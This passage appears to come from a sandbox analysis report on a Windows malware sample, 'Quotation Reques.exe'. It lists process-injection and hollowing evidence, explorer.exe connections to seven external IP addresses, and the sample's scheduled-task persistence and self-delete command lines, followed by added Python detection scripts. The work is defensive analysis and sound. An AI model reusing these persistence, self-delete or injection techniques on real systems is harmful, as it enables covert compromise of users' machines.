          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 6_2_011A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_003AB5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FCAAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03088B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB52A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FED294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0306D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03085BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB9240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030353CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF4A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB5210 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBAA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307AA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FDDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE03E2 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03044257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE4BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0306B260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03088A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC1B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE3B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEF0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE20A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD0050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030351BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FCB02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03037016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03084015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE61A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03072073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03081074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FDC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03033884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FDB944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0304B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0304B8D0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD4120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB9100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0308070D mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0304FF10 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03088F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FDAE73 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03037794 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC7E41 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEA61C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FBC600 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03071608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0306FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307AE44 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0304FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FCFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03080EA5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FCEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0306FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB4F2E mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03088ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FDF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEA70E mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0303A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03088D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03033540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_030805AC mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03036DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03036DC9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0307FDE2 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03068DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03071C06 mov eax, dword ptr fs:[00000030h] (14 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0308740D mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_03036C0A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FCD5E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE1DB5 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0304C450 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FEFD9B mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_02FB2D8A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_0038AC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,
          Source: C:\Users\user\Desktop\Quotation Reques.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00397310 SetUnhandledExceptionFilter,
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 16_2_00396FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\Desktop\Quotation Reques.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 194.9.94.85 80
          Source: C:\Windows\explorer.exeNetwork Connect: 77.72.1.202 80
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.133.87 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.59.164.34 80
          Source: C:\Windows\explorer.exeNetwork Connect: 138.197.103.178 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.46.143 80
          Source: C:\Windows\explorer.exeNetwork Connect: 51.83.43.226 80
          Injects a PE file into a foreign process
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Memory written: C:\Users\user\Desktop\Quotation Reques.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 380000
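Read together, the injection signatures above describe a two-stage chain: the dropper writes a PE image (bytes starting with the MZ magic 4D5A) at the 0x400000 image base of its own child, unmaps the original image of a cmd.exe it spawned and maps RWX sections into it (process hollowing), and both the dropper and the hollowed cmd.exe then map sections into explorer.exe, set a thread context in process 3472 and queue an APC in explorer.exe. The parser below is an added example, not code from the report or the sandbox; it rebuilds that chain per target process from the evidence lines and names the ATT&CK sub-technique each stage set amounts to. The EVIDENCE strings are copied from this section, with " | " separating the source process from the evidence label; the stage names and classification rules are this example's own.

```python
"""Rebuild the injection chain from Joe Sandbox evidence lines (memory writes,
mapped sections, thread context changes, queued APCs, unmapped images) and name
the technique each target was subjected to. Added example, not report code."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

LINE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<label>[^:]+):\s*(?P<rest>.*)$")


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (injector, target, stage) for a recognised evidence line, else None."""
    m = LINE.match(line.strip())
    if not m:
        return None
    src, label, rest = m["src"], m["label"].strip(), m["rest"]
    if label == "Memory written":
        mm = re.fullmatch(r"(.+?) base: [0-9A-Fa-f]+ value starts with: ([0-9A-Fa-f]+)", rest)
        if mm:   # 4D5A = "MZ": a PE header landed in the target
            stage = "pe_header_written" if mm[2].upper().startswith("4D5A") else "memory_written"
            return src, mm[1], stage
    elif label == "Section loaded":
        mm = re.fullmatch(r"unknown target: (.+?) protection: (.+)", rest)
        if mm:
            stage = "rwx_section_mapped" if "execute" in mm[2] else "rw_section_mapped"
            return src, mm[1], stage
    elif label == "Thread register set":
        mm = re.fullmatch(r"target process: (.+)", rest)
        if mm:   # the report gives only a PID here; resolve it via the process tree
            target = f"pid {mm[1]}" if mm[1].isdigit() else mm[1]
            return src, target, "thread_context_set"
    elif label == "Thread APC queued":
        mm = re.fullmatch(r"target process: (.+)", rest)
        if mm:
            return src, mm[1], "apc_queued"
    elif label == "Section unmapped":
        mm = re.fullmatch(r"(.+?) base address: [0-9A-Fa-f]+", rest)
        if mm:
            return src, mm[1], "image_unmapped"
    return None


def reconstruct(lines) -> Dict[str, Dict[str, Set[str]]]:
    """Group the injecting processes and the observed stages per target process."""
    chain = defaultdict(lambda: {"injectors": set(), "stages": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            src, target, stage = parsed
            chain[target]["injectors"].add(src)
            chain[target]["stages"].add(stage)
    return dict(chain)


def classify(stages: Set[str]) -> List[str]:
    """Name the technique(s) a stage set adds up to (ATT&CK T1055 sub-techniques)."""
    techniques = []
    if "image_unmapped" in stages:
        techniques.append("process hollowing (T1055.012): original image unmapped")
    elif "pe_header_written" in stages:
        techniques.append("PE image written at the target's image base (T1055.012 candidate)")
    if "apc_queued" in stages:
        techniques.append("APC injection (T1055.004)")
    if "thread_context_set" in stages:
        techniques.append("thread execution hijacking via SetThreadContext (T1055.003)")
    if "rwx_section_mapped" in stages:
        techniques.append("RWX section mapped into target (NtMapViewOfSection staging)")
    return techniques


# Evidence lines copied from this report section (source | label: details).
EVIDENCE = [
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Memory written: C:\Users\user\Desktop\Quotation Reques.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write",
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Thread register set: target process: 3472",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 3472",
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Thread APC queued: target process: C:\Windows\explorer.exe",
    r"Source: C:\Users\user\Desktop\Quotation Reques.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: 380000",
]

if __name__ == "__main__":
    for target, info in reconstruct(EVIDENCE).items():
        print(target)
        print("  injected by:", ", ".join(sorted(info["injectors"])))
        for technique in classify(info["stages"]):
            print("  ", technique)
```

Two caveats when reading the output. The thread-context stage is keyed on a bare PID because that is all the report gives; map 3472 to an image through the report's process tree before concluding which process had its thread hijacked. And a 4D5A write at base 0x400000 into a freshly spawned copy of the sample is itself the hollowing pattern (the child was created suspended and overwritten), even though the report files that line under "Injects a PE file".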
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Process created: C:\Users\user\Desktop\Quotation Reques.exe C:\Users\user\Desktop\Quotation Reques.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'
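The three process creations above cover persistence and clean-up: a scheduled task `Updates\ftkqUsB` is registered from an XML definition written to the user's Temp directory (the behaviour behind the "Scheduled temp file as task from temp location" Sigma hit), the sample relaunches itself (the child that receives the MZ write), and a cmd.exe deletes the original dropper from disk. The checks below are an added example, not code from the report, the sandbox or the sample: they parse a `schtasks /Create` command line for the switches that matter, flag task definitions or actions that live in temp locations, and recognise a `cmd /c del` aimed at the image of a process in the ancestry. The two malicious command lines are copied from this section (the report renders the original double quotes as single quotes); the benign control and the list of temp-path markers are this example's assumptions.

```python
"""Triage the schtasks persistence and the self-delete reported above.
Added example; the benign control and TEMP_MARKERS are assumptions."""
import re
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List

# /KEY value, where value may be single- or double-quoted or a bare token.
SCHTASKS_ARG = re.compile(r"/(?P<key>TN|XML|TR|SC|RU)\s+(?P<val>\"[^\"]*\"|'[^']*'|\S+)", re.IGNORECASE)
DEL_TARGET = re.compile(r"\bdel\b\s+(?P<val>\"[^\"]*\"|'[^']*'|\S+)", re.IGNORECASE)

# Assumption: substrings that mark user- or system-writable temp locations.
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "%temp%", "%tmp%")


def unquote(value: str) -> str:
    return value.strip("\"'")


def schtasks_args(cmdline: str) -> Dict[str, str]:
    """Extract the schtasks switches that matter for triage, keys upper-cased."""
    return {m["key"].upper(): unquote(m["val"]) for m in SCHTASKS_ARG.finditer(cmdline)}


def is_temp_path(path: str) -> bool:
    low = path.lower()
    return any(marker in low for marker in TEMP_MARKERS)


def check_schtasks(cmdline: str) -> List[str]:
    """Findings for a 'schtasks /Create' whose definition or action lives in temp."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return []
    args = schtasks_args(cmdline)
    findings = []
    if "XML" in args and is_temp_path(args["XML"]):
        findings.append(f"task {args.get('TN', '?')!r} defined by XML in a temp location: {args['XML']}")
    if "TR" in args and is_temp_path(args["TR"]):
        findings.append(f"task {args.get('TN', '?')!r} runs a binary from a temp location: {args['TR']}")
    return findings


def check_self_delete(ancestor_images: Iterable[str], cmdline: str) -> bool:
    """True when 'cmd /c del <path>' targets the image of a process in the ancestry.
    PureWindowsPath compares case-insensitively, as the file system does."""
    if "/c" not in cmdline.lower():
        return False
    m = DEL_TARGET.search(cmdline)
    if not m:
        return False
    target = PureWindowsPath(unquote(m["val"]))
    return any(target == PureWindowsPath(img) for img in ancestor_images)


# (image of the creating process, command line of the created process)
SAMPLE_CREATES = [
    (r"C:\Users\user\Desktop\Quotation Reques.exe",
     r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp'"),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation Reques.exe'"),
    # constructed benign control: vendor task defined under Program Files
    (r"C:\Program Files\Vendor\setup.exe",
     r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"'),
]

if __name__ == "__main__":
    for _parent, cmd in SAMPLE_CREATES:
        for finding in check_schtasks(cmd):
            print("PERSISTENCE", finding)
    # The del runs from a cmd.exe the dropper hollowed, so the dropper's own
    # path belongs to the ancestry being compared against.
    if check_self_delete([SAMPLE_CREATES[0][0]], SAMPLE_CREATES[1][1]):
        print("SELF-DELETE", SAMPLE_CREATES[1][1])
```

Two practical points. The XML file is transient, so the task definition has to be recovered from the Task Scheduler store (`C:\Windows\System32\Tasks\Updates\ftkqUsB`) or from the 4698 "scheduled task created" event rather than from Temp. And because the delete is issued by a cmd.exe that the dropper hollowed, matching the `del` target against only the immediate parent's image would miss it; compare against every image in the process tree.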
          Source: explorer.exe, 00000007.00000000.271852974.0000000005EA0000.00000004.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000007.00000002.491976988.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000007.00000002.493320852.0000000001640000.00000002.00000001.sdmp, cmd.exe, 00000010.00000002.497699646.00000000057B0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Users\user\Desktop\Quotation Reques.exe VolumeInformation
          Source: C:\Users\user\Desktop\Quotation Reques.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
